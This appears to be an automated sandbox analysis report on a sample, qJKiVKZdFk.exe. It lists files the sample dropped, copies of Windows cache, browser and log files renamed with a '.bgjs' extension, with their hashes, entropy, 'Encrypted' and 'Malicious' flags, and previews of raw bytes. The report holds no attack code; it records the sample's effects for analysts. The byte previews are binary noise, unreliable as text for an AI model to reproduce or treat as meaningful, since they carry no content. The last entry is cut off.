                                                                                                                                      Preview:.{..&......}.z..'...*..M....GHW.s..h.:".z..&<...I.Z.dUOW.I_.o....../..4R......n..L(.....5.+.<.J:.?.....>X..9..G1.8._R6....-u. ..T.*.....Q.k.A7F.. ..0{.1....j.....dc.D......@]m...y. /......4.$r....Ri\.J.a..Q...Z#U....&.....q...:../..h6./.r..G....)......dDK...\.R.#......s...#.(..;y..|iEW$.t.j. ..P-....b...~.CJ......].....].I8.rs........D......kp.&.F..|..n...T..j0|..g..9P...q.....KQ(.0L`.......&..uF]!.7QD.,....-w:..eC1g..|V.w.[...n.).W.. .......:..%=......m.c.H.7...`.|..A1L.O..e.-/.#.wP..)[_.......m._v/.....8..R.V....B...)X='..:.#..zx.F...5..Z.!.g)..a.;.2......q.q.M..,....]....B... ...R.57!..v1....Ifv.`..^..T).?..'.*....>..t.es.V`..d;. .-..'..B...$..f...<%Mf.h.....G.9..]..@..w.._..%...;o.a...A.<z..c.%....].^...Hy...%..2....A.?b..]...g[.,.WS.V....E..!..lG..x.p[.......v.Th...z...7.Y.oHBO.N_..=.=8..m|...k.=g."f.a(.u.u...j.#.".k....q.H..t.[.......U..0...Fs...TF.6.x..HK.X"..Jk.!.wX..<...ZxC.g.....EO.|I..V...fW..%....}?.E....R.S......v$

                                                                                                                                      C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65886
                                                                                                                                      Entropy (8bit):7.997419199727783
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:Zo73DOr5JxoArCe4dHJy/yFFGp48nR15k0YJdAhwQF:ZoiNrCeac/yFuH5k0twY
                                                                                                                                      MD5:C0AFDC62754716237BEE57166DC3FF08
                                                                                                                                      SHA1:042B8F96442132EA3B6FF3A48C525FE1BA677421
                                                                                                                                      SHA-256:18FC39C7ADD9C4C25C855D4C0909B0D3A236E0C41F36C8B1401BA28E389B2493
                                                                                                                                      SHA-512:C3F597AB5055A6F3DA3D1B0E8D1CF07246967AE290ADEF236A6A6D401A8290124B44FBFE8775D62C96AD8AA19464F8DBB0CED56F94CA2DE96D0CD07047E2EBAC
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...S.../..N.Q!aZq..H...26......m........rW..0f.S.....Z....U....a.i.^B.J...,..c.}.@.W.7$.jf.(. 9s....y..(.K.u.B.=l.....$.].....N......)N!B.B..F...a...,?......z..w.0.u%x..../".d?,Q..4./f.%X.. /q.C..57.).|..R..2.j.t3....&.x.....B.......Ps.z.V....2..P....R..9F...Z.Y.8-.g...g.\2u(.....wN..'@+lTak..K..mI.H.d......5.i....M.......&...?..l..PW0...1.>up.%/..O.\qr.-A..h...3cM?..1..<.<.F+..o..J:.x.]$9..h.4.t .....I...T.p..#......h.qh$..=.'.v"C.k.... ......|.Y....5..Q.\..Uz~u..T-........*H!'.t...N.A..]..\8..MeF.7.s..,.&..&4..3.@..a.:H...<"=.%b. .Z.VM..f:..O.^t..9...\.....1...\n...g.........&uz.5.D....)...?.{.....6.>S..J8...Dz...K.[].;.lx.#...`...w..........n.2..^8....t.Z.I.$.J....p...w1Q...g..m.=o.H....;...|.".N....f..:......%E./...X1D..v.vF...<Rj..Mr..s...t...t...d~(..E..N...DO.;_ .gM.3..U..A..=:..:...v.T{...o.....a.....&...5.XG.....I..=.;9......g5.P..AS...C.<.+......~.KV*....8...Q.X.2-w..S.!..i...B..m.4r.b..pT ......E.#..0..;`...n8s.E.....(..\z.

                                                                                                                                      C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65536
                                                                                                                                      Entropy (8bit):0.30217803660487286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:H1xLlfQXnpY+zQRVtdUdrFrPL/pbEA7mj2RSEaGpxdZGz:VppanaMQR3E5PzCAfRSEaGz+
                                                                                                                                      MD5:CBCC1FB38ECFF663E7A03B2BC7A44AB9
                                                                                                                                      SHA1:53FFDAF4C5A42541C55A54516F1295CC68394EB3
                                                                                                                                      SHA-256:112C6405474CBA640AD2927115864E8500377558EF5E9BB6A0613C647D0DFE34
                                                                                                                                      SHA-512:E07CDAE277D8367C43A9F980A27A0088BBD7FBD3A41FC273B710B1FA7B9B7FD36578EF2C38BBB142A0424332D6B02203E81E362148D6416FBA401A8EE3BE6D40
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....&.&.8.oA...n.....,.....%a...0mJ~wZ....\.A.{.(wn,z ....l.~i.y'...O.....[.,...... )-......X.j...+1..<%F.E...31.*.....O...c...$V.4.A...z.~.. .'..v+..9.G...../...[..x.......h*.G.jJ.?..1c7xO|..E...h..^.<.6......aG!.......>h..e.N&_.[.E3V.u.'%..,.r...#G..L.......4}.T.n8o/...7.6....&...*.2@..;.. L.....]x.;p..7.f.!.N..K..0..Ou.......?....$..>?..g..(Ad...u.4.......?.&...G.....G.......x..LH..zzf]d.]...^.4D...k.o...C....<..G...[..8..(..Y.S<....}.I.$...da.....A..PY...3...V...?^..x..0w6......`J..@.&e<........j......y.V^M0.q|G.`.:.q..%....Z..>wd(..|x...5f.o)J`k.5.HP...>.l...b".......o..+L..e....v....n.I......I.7.....A..U./...._..S..5.S.....{gp:C;z....'...+..`.y.....t....3.Z$e..'&*.........c"..m.$..w....+..E*........Q......x2....xl.&.6Pi.&....k.0...w....P..j.m.z...\.]P...e.%.a.h........M7......K.%.c...#....5...C...NaVXgG...S....&.......OX.,....9....V..O...W.q..&` xpj....<',........E..0....S...;.'!..O.-...hsx@...7r.......Z:.I$.H..H....-..u

                                                                                                                                      C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):49486
                                                                                                                                      Entropy (8bit):7.996163491879153
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:oZXC/I13AAtDkc7g0VxqyZB36oEI6YDZwab6Vz:wMu3tgc7g0H7tnZwabQz
                                                                                                                                      MD5:750F1EA6C394437F1D088ECFAADD7222
                                                                                                                                      SHA1:1150DB974093BD36B8AB2D950551947C31A8D25E
                                                                                                                                      SHA-256:6A5C67097FB9E845E764BC7C107D2ACA9EA6E51326ACA08884F142B897CBC939
                                                                                                                                      SHA-512:FCC0E01DB3BA87E336E2B2CBC75D9B25A08AF01824BAECD781724EC18DC8C143C002DC7E4B1DC525B5A6E48F95ED2093DD3BEF353BCBB450905575DCC596D580
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit...q..M..j...<.....&......c..o....i.D.vT..FE.S...w..\.l.`T-V....m..P"9.R...6..q_X..4....p`v.Z<&.Z..%-2...Ik9.})...Y.6..t)..Oz..@..D4......J.5H....?..p.x.N.I%.Q.[&....[Q..OG..r#..z..i..&.k...?G\.~.f`<../....|.u5..{]J.\...&.R...!.pQ.[..T....y..F......m.,<....o=Qb....V.X.......a6.........7.......E.Wk.p3Uv..*.r.....0...Z7P....0.R.=.o.%.w.]...".G5C.A.~...j.Z.yI.k..Nh.j..T..V+..nN.4.l....@..oui.M...............[N..).u.l...7.HuZ.4%..x..R...|.._..$...L5.....[O@..4.R>.....8n.G.....e..V.........S.. X..3.s..e.m...jme.]m....1.r .U.U...P....c.r.m...p_9.?K.=..R"..gS.........v0.s.~....Ze.Jp.......;.....q...9(*.gQ..[4X'.?G..v;.H..}..9...C=.3....l...].c.*.o.{.....S.%..TS.<(&?=1./...t..ph...G.t.)7kjD........%X.u#.....*...[..a....A......]..#.&..F..=.8M._9..../l+.m...7..5^}....'..4pnD..e......O.~..M.....@^1,.p.p.y.13....z...'..iU...v..g.p.a..SaVQ,...(.kn...^Y.&KT..A.....e.....=...[*E...m..A...+.I..w...@.(...H.....^..OM2..8e.L....K.,.P...h.

                                                                                                                                      C:\Users\user\Local Settings\IconCache.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11317
                                                                                                                                      Entropy (8bit):7.983127959817394
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:XzdQzlJqx2h52yJl+5qcB2BQABggnyGV4kLQYe41qlS8uxC54RPowiiZXbs77O6/:XZMnJlTBGAv59LQtuql4Cqpowmq8
                                                                                                                                      MD5:7142E7BB97E9F17534D336434E0B0934
                                                                                                                                      SHA1:CA4C24D710A66A0351DB607789C8AF5578F792B9
                                                                                                                                      SHA-256:E78AA5C30F87C051458C128AED96FB730827A80D1E0A3E7E129A15BD8FE19838
                                                                                                                                      SHA-512:F131113706662FB49239E839992DBD875CA0129C8C3CA82A1CA722EADA11D1920EDB718F778A879B17A29A2A65F68C4956B6ED8148120F41A16A9626190E0150
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:H...W%'..j=.E..G^+.... ....G.0.....V...O.J.*.....%..{TZ9.P..)...<..)..8.P....r.4z.H...:x^$./^\.\W..)L.+K.i.G........-.M.Y#.f....C,.c.y..[<...:....c.......b'....:0.7.......,..Or......4..E..y...I=...Z+|.}.....VA.\.t((...{..T..M....v.Pv.#.5...o.r.....3/./......;G...n......b:...1S~.O....Hr=8..E....o.....`+.Q.}...V.#......(.o..N.].]....L.r.h...e...K...0.S.km&...s..w.e.YT.N.TS....B........W%S.....t!...y..K..-.F{*X.%....<...p....f.Z..8.......(".Fm.......9.x....)...?E=L.....;.'>8.-....N:..=...NE.$#...\...99>. .v.......*F.....X.[.?....,b.D..S...Q..z.s.....F..N.w#...?x1..Qn..cx.....\...P..B.p.s...y..-....fW...~l7..(.Ut;M..X9<....`.# Z..>.o.b...._..i&.E.....M..B..f....V=...m ....6..HD.Cz.bz..0.#...]..p....LB.0'..b.O..$=T.d...r..QF.SZ.r5.OC....l...Ua......m.D.|......U.,E%e..J!K..[..4..jy.t`...o..T.2..)I...Q|6.....I.6.M..;zg1.... J.|.f...#..Z.0.p...N...._.}...8.c.9....qS..&.>....Y=..F-e.3]...4._....Iof%#.p..._T....+...^K.j._.9&......l..c$,.....i4.F.p.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354
                                                                                                                                      Entropy (8bit):7.316899760622135
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QRMBcgbeIlXeZvy5BhrKHF+cko+mXYrq6OjRottv1K9dgBs2w83ukIcii96Z:QRMBcgPNeuBhYEcwCjywi5w0ukIcii9a
                                                                                                                                      MD5:3720F7BB4C2B9979174AFD36B0887018
                                                                                                                                      SHA1:44FFF8418FCEAD836F9892EB04BDC32746089506
                                                                                                                                      SHA-256:FE2496952DE97616FACFBCB4B91E86A5AC180596BD3E8D7442ADADF4B2D155DD
                                                                                                                                      SHA-512:853E70D13C64CEA6EF11865B04B3D752CA239B6BFFF98747D78B06A76143B981A34B3034A2B43A3637A9965F8F6F048985BCF5B286DDAC05AE933BDF8049E77B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu.....T....>....M.;....s.~..F.rNJ.N.9+.......}8;.-2...M... _.*.1.;..G....!]!...."D.%....3.[5....zy..v).........s"\...2...A.$j#3.-.s:Pi.i.O@..I...l.5..#2.e.+.....S...@fl.5G...=.f...C.}"....$........t...:k}.q..h#3*z....H.8.)P.......q...'..;....*...N.~..T.X.!.p..k.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1554
                                                                                                                                      Entropy (8bit):7.8419135053715205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:0BqeJ3fgy655de8ge7p/tCYHLVVWMqc643KD:8JYy655ngwCYrVVW5/43C
                                                                                                                                      MD5:3C022F88C6BCE3C7DBFCA24FE222125C
                                                                                                                                      SHA1:6E5F8C491724A36200DFF07BE9AA7C000EC9AE7B
                                                                                                                                      SHA-256:D04A23BBBC936DC81EFD2E6EF2F1F72212CD5E0A7EF00E1066CBEBF351667E9C
                                                                                                                                      SHA-512:306A110BC8DEBD99DAB1BB93EDC976F73A2D84527E43D9A97F1289F87700B9834F0161B0225C042731CC8B5B5F6D7263D53C9F04E968FA9EF8B85C70B019008C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu...z@h.:...M?P.f.i.v.Z.6.N.2x.E..Cy.;.....y.#`G....R.AH...sid!..^..1L&C.......s..Z.Tl1...2J..`..V.M.....z..a....i..2P.M...$..mUP}.....+....-i.<...e.7....^4...c..4.!'......{6|..F..2..V..j.....%...7..s<.....RY2....B..n...v.K.:.yo8.k..=%..9....5.[El.".P..).I.v..VRh"O....tVi';Hh.N...0$C.D..p...{...H...i...an.E,.........:y.Z..7.%..+..YK.l.<.t.m. .q@......"A!.+6a.U........z.74V....{.e.gl&8...CP~,Bbw...f.;B......44..9....T....1.....9....Ay..05.nKt).?..8O@vD......;\*g..Nw..M........GF.....k.a. C...q..1s85v.5.E.....~....J)m.[..P....6..O4C..Z.>wR......7.GPCL..........23.+.e&.)..J<..v.r..h.I....T.k...........!.........K...ai.m2.......@....&1.../....dTB.!..+...R...).}..!.p...Zj.T}.......T&..A..K....<...=.J.[F.-....l.l....$6....l..u85..R.[._..%M.<......r.te&/.4rW.i6ysPGJ....)i:...W6U.DT.bg.;._.-...~...RW...0...9.N...._v.F........WV.%...3..)wQl....Y..}....SFWh~.h...].P...[J.qww......_..?....0..N..X!?...~..F..!p:u..N.6b.....r.{.U..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1952
                                                                                                                                      Entropy (8bit):7.889739541759159
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:H2He61VwEU18apy3GtRXAz+RrsiFocbwD3HnuFIJBsXeGeaD:Hz6jdU1nWGtRQz+9Vicb23HgrXHp
                                                                                                                                      MD5:6F6C22B7B2A03375AB614F96BF2CE4C2
                                                                                                                                      SHA1:54CB00E2894757A80DA269A5578E8384279A616F
                                                                                                                                      SHA-256:4D5E15F7C9523E8C208F7CBC01D3D312566107CD183F3B23744FF89DF5945C21
                                                                                                                                      SHA-512:714583D8B8B6F7AC3E77E2876D8975D889DB84FDC6F8CF02C62B2F379736F4C56CDF83770319BD0D63B1D9E933591CC07888C844B4FE08190E7590442DEEC19F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu.y....cz..=t....`............6..E+...g..TX....l...I....M*...+..DF7......=..(... d.(.y.D.._E.<...E3d..C....F..b....]..2...R...l.~..L..n..:S.Le.9...8..O.XO.4...QM.N.]....]\-....%.0..Kw..|....<......'...:q.@....H..!O.s.;"|V..Nd4,.WGL.<.....[.At...t#.;3...(r..>zZf(c...@..J>..E.t.f@....).4.X..c.jl.8$]....6....iT...x.Q..M.A.@.3WAnE..4.t..._.})..,~....sh]:N.f*.^.x!.b.=b.i-.d.H.[..!.b.J.e{..N.1s....u.....R.J)*.&....;..]L.g.....Xo...e4.wU...j..?yJ1l.k!5....P......,G.g...n.4.m.6.^V.L.H.w..<.u_.Q6..3w.B.a.*J.9N.8.}].0...*.}....7R..H.(..g...+L#E,v......K...6y..+.hs..K.....=......".^............J.u)|.A.S..-.km..s.61...../..I..v......>KL%....j9.B=W..7V....Cu4........4.b.]..s.Hu..k..l......@.c".......U.j....Io.b...))..&~,>[Y...:.....+.....G.....h..p.U.g.8\6....N..2C.i>0u........Qi.....s.....>...I.WB...j`...^....n..a,C#.D\,..9..H<..5J..%..1..Z...&P.3..IN....,$8.s..C..V..f..z..+.n..........Y)....4Ln../cm...t..`..>;{z...^?T...9.Ar

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\FontCache\4\CatalogCacheMetaData.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2203
                                                                                                                                      Entropy (8bit):7.912291104518468
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:wEYiSFYjKNkmuMkG2yDuKHcltf4U9pKZvoqdy/UQGBIyKzlWAIqXQnD:f3SVn2yDuK8fLwvDy/UH9Kz5LgD
                                                                                                                                      MD5:DB976CD4F8EF07256828C42FA4E18ADF
                                                                                                                                      SHA1:8F7C46F5189ABA87AE7E56573D89F56EF991FA59
                                                                                                                                      SHA-256:117E85BEE93A0B7C4D8140A4A1D2DD5AF11E8ABC10F84505403E407DFC3D70FF
                                                                                                                                      SHA-512:0D2308263AD323BC2BA6D3779401F8650D6C14012A95EEEE861CF9280474440E0F4D946E3D2FC3D1BD88F1D214D469EFEAFF4B21F0C2066EF94BC69FA44E679F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml._.E....TC.a..V..p}Th%7.;..Kp.Y*..#...h...,1.(UJ.Q.nL............T..#&[N1AN.H.....K..G5...>..Fb.2....XB..e!....uIN"D..@t.-CI.zd...@...;..r......xW......... ........T.[<.....1..H....}..Q.<t)xV.!O".&."..A=....(|....h...jgo.A..........F.C..aW.^.6.}...6RG.Y..;.}......M..,.c8..D.{+<V....2...E.}3.....@..Z..m...}.`......W...Q......s...0m...V....e.........ZfQ..o]..q....c..Y.C.....e8$u...IWD./%./....._..R.....AI...%.4..9.BOrt.......P.'..YYM.........$e./..MUR.F$r......y.. ..-..^.].7..g"-.._..=.M.6.R..G...t%..t..=.}..YIgec.D#\..D..;D|wK.m..wt.VZ..];I....X2....\.)~...X.._...v.h"nX..1P....M...F..h.0H.9...B*bT...b.....v....Np..%...W..&$./.].=.`.;T7O]g.....%.[._..K...d.,.x.. &t9X.z...$o.I.E.....s.q.y..k,..".Fr............. . ..T|..1....v.6...:....2.=.y...#.j...G.Y%...u.|.3|.zv+.Y.X.4..N..v..S.g.kC..qCYn.V..ph".j.g..x..u..V.U.p8.D..c....he*``.va.+W...jaM'U.bM.i..b...\...8..o......s.`...Y.34.N...9.,..}..M.I`^...(.J.P%/.....-.m......%...p.u.....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.chk.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976957743237655
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:S94jIZMz6y8rDP/dWpIyh86VvoMbP5DIjmW8dFGpPczPK+:S948Kz9sdVyFVvoMbRDIjmrdFGpPSPK+
                                                                                                                                      MD5:FBF280579338E7650B96CED720C53218
                                                                                                                                      SHA1:FF5E013540B0F31829CF25E70B4890323F975AEE
                                                                                                                                      SHA-256:416CCDF743681C89AECAA2F848E28CC4EE3DEAB9A5FB0F244BD907D4F5BFEC93
                                                                                                                                      SHA-512:A30D60480C58EA8A0B76686A3AE3C46DCF488BD983CA841FE7752374292CA1A1A69766656B7883D1BB90639C74156DAC7715EF504960F2E43FFBE73736D204B8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.._.:e...\.~.'{. @./#$}0.4..y....5s.Wk.j.X.( r.J....6....]......h).....H..)y......wn......@~..Z.iz..x..%7...Cr....I.|._AP>.R./&....k..X..o.EOC.De.a..P....j...qN\%(..(..T..CA..Y.....3..9<..0.'.!G{.....".L7.Z...6......w..Z.(..g....yq.E.)]"6=....i45.h.....d.U..A..b...'.V....>.?.Z.....R....&^>...&..#..jn...g....@.c.H._:.3uw..T..z....!J..>(...?.....M..F.RN",%.j@....w..-. ..U..I..=U.7.=...v6...).x`.s.&..io9u^.`,Q..]..B ..Wb.%'.E....l=....i.=.U.C.....Y..8.O..k..]*..._.X...d.S.x.5(.[G.......\.I.S.S-..R....u"...P..,..X...]!e.!$3+e..f..E.Y_.{..7-g.%nAG.v}.......x..G|a.O.e..K.cz....V.o.>..U..g.C......M.....g..w.X.(P.....*.....#......*:.,.....>*.s.....C..Z<.|......bW_f.M..?J.r!.@G.."...3.....k@.6K..o#........B..........Vr...xd.#*fTT.3C\&`z.f......7..s...qO)[.HSLa.N.,.B...qX...p.......7m"(.x....l...w....q..8a...w.<J^Mb.N... ......=.6.uPW...,.a+...O+HV.Jd...s....j,YY.....(....E.P8d...W.....g...U...W.h..."..b3.../;.... . ..vl.....6.D.".u........S

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.953112367835487
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:/kW+mnhoJm27EbrIbKT/+ypy1J4AfsrkDe5pJnr5g/V8F24zmIgEkrfVgDXmRjF+:/kW+u6827A/+yC5soAz+V4SIgE4hA
                                                                                                                                      MD5:517E258372CBE0F8E679ED8D96F15457
                                                                                                                                      SHA1:9D10EA8C477A692CBF67459776ECC4A4E7CB1143
                                                                                                                                      SHA-256:42AE6CBCE2C4D52873D883FDF6F1AED265B731984D7A1A1EAD3C96F686E21339
                                                                                                                                      SHA-512:9575E9BCA3A87FBEEFEC3E1D2099627133E932DA318F6AD57E1FD21180CD4C913A0AD04629EA7B0785F17C381827375DC56F574C8815D9FCD34C287E784580A0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:cy7......Lw._..*G...m5......>.(......*.7.+.).^..|cs?....x...9...-..v.5..:..O.%tQX...d..O.O+...a.`..b...5....I..n.a|r...#...o.pO|....4...A....J...w[.jnU..'K..~..?....l,b....\3R.%......]..JB..\....M<!.G.-....Q.c..M../Q....P../.(].!...<.@XA^.....9[..Ye...../.W'...{.+u^H.L.=.....Y..z..........~.B\y.5.1..t......C....s.]...A.....E.Y.K./2t..M.1x..Y/.FV..8....}..8..~./...q.;-.V9..Hd....w.jh.....).JS...1>..2t..|.p.F......n..T.A.Q....S...t.]tFf|.;vF..;..I^..\)..W R...3C.|...8G ..j#*M.6.]........l..:{.S....9_...$.R..E....f..............l.R.8..;.."cg.'B.?.\....:ME.f!....[...y....p".RQ.Al.C.@...EB #a..'vQ.T...j......4...B.....v-.~f...z.....F.p....\lC6........!.j&.T........u.> B....%...d'L#..R....p.....=k.3.;.'..-d..wH..!y{.c..k.dP.lA.q#a..L......8.gi.V)EeF...\f.!/..qz..N..]........w.wF.c..SO..X.g..Y4A;.q.dK...(W....W....C..1..f...GX.1r.~...7/[\.'.....N....x.7.A..43..;.,.v.#{.......C..0.......Y..bu...;=9-.O..Y.T...epW.r.;..A...v.N...L..wn.....'2......$.,....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.2082449339275882
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Mqv8/ZJPtpGzwYheacg18SrI4DwdpNkADtCHTHOcnbqHR7pSSi:MqU3PvGkYcJg18GI4Dwb6lZnM7I
                                                                                                                                      MD5:ED983C232458B1CAC9F9F65E3DD1D90D
                                                                                                                                      SHA1:C078EEA4ADAB8391FC5F6E33ED16C8B64E499BDE
                                                                                                                                      SHA-256:CBC4D7995834B12274C83E629C34B48890BB8168A408080F9B1EC553ABA28F66
                                                                                                                                      SHA-512:3CB1643466CD714813F5B9298383AC60C9C66D00192359D71716386C7643F7C1FEEDB9021694697D79C4515BC8BB23BD052AC8F572526EF3FC74CC5825FBB51D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......1T=.Z{;y./...~.........I.. uv.....=.R.R.'.........n.....x:.F6...d..G..q..ae.O.!v..au.p.80..?.yFRM......b.4J.].a..%Q.L..*..t.R...R".tYl.....uK@.qPIJf.0o..0....y.+3Q.....C..1.4.,;..v..d.......#..f.F.O.+"..r..7.@.AU..2b.$..u4[.2...q.........?..J..=.n&W.8m.0..p/u..h....G'.w.Q.y-~..QT.v^n.v.....4.=k.:&.S`S..GIv...*@..K....%n.k.....9.R&l.........E..n..(C.\Wb...nK.FR.8I.!..R.......l.k=..o}.f.I."n...-H.*......[jY...}+...rNMJ.........(...5....`C.....<l.`...=2.V.6|..W..W....m......0.._...9M<..uxi.R...%.S[...X...f..z.".o..-.i......[tV6u\.9...S....j?}...G,i~i.6.....A....+.X9.*...E?.1...2....aE..-..{k..|.~..>....:..s..B.....P.5z..."..L4t.N....{..|.W.F.P..@...Y{C.....m.W-D.K.6U[..5GYV....R.k ...x..[|`...h.q.....F..T...q.S0...1..+........l.,.f......."."......-...............Y.f.$.%%..\C.Ya.$....p..t..e..~....9K...IJ3._....1X...m.U..Y<:...C`....f/.P....+8.I^.5.q.s|........I.E...P[...F.H...t.c.)].C.2.X....t.,.Z......J.@P..HwA...~.oD....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.207562784429721
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Kktl2Sj9Kvi1qySelRxzkprJksxSy3RImqoGoi0mVx3W3hULBNQwSW1H:3jcwrSrrVUuDG9J6xULBqwR5
                                                                                                                                      MD5:CD5D2334DEAB55251FAB24DC0E1A6A2A
                                                                                                                                      SHA1:6B1255D27650BBCD33BC06AC2F28E5490CAA8046
                                                                                                                                      SHA-256:3C5D1E137333361EBE27C028C24A4AB955266CAAC1240CC9E1C049EE9A626425
                                                                                                                                      SHA-512:FD91ED0E2FA018119C104D3FFC00DA9B2B6718DD3CD93B37B83B99F8E17BB262D1AE63C9ACEB712DD4345E90DFCBAB375944693125EAD11508F1DEF1A75AC373
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......z.....Z9|..J.Q^$...o.x..`...8{.Kig..{...h.....#.=......b.m%........uP...KO6..h......W|8D.pvi..z.'.t..q.....h~\.:i!.g...>&C.{...Z.......i..@..-..p2.D.R..`.q.Z...T....+tb'.[.WR72..L..s.J.Wk:./.I..,...*..'/;.R a.C..ua..2l0...$S.dk.m...\...d...x....6.S.|....L..(7....]..tb:.2....u...<...k. a...a.9..0.L.Z......FR..P.M...R9N....\D.....0.e2..u.-.Q....`...,l......e3.7p.Z.Iz@t..L.$.......:....n.y.E..25.`.{..r.jS.6_..+'*...HW8.#.6.z......._...v:t.qK...7.|.$..........X.f.c.."f..A.....i..$m.9f_.....fxl..G..E.S4.E.o^:}..6..i..`a.....'...1..07..].~L.qcpyQU.<..k.J...YG1..W!...f..$[RL1.@....Q?.Z...)..|f......1*..5......+.q.@g.jv.....).|....(...6..u8.....4..%...J..5..'s.~..........g.J.c...m.}.%.....a..@*#K.Y.M...' 8...o...37.2(......Oc.C..U.8.R.I...i.a7H.a..... (..F= v.........(...d...4p......F...+...R..9c...A..M6..j.t.A.!..l.g........\|5.].ci...l..!h..[Y=....K.....E(.....].$r.15.<bL..qQ."v..Q..k..a=..4WW$.....5..uI. .T..=... -.M..e...|...

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbtmp.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.208333850932194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ICupOmY/rl5Z5RChHzIdOGYf0nt2EWrjHOWBlKuVLCgUQNDY:ICuRY/rl35RmUwGYfSo/HHbBlKug+Y
                                                                                                                                      MD5:EFBB1D4750D4BA277E8508D55AE44992
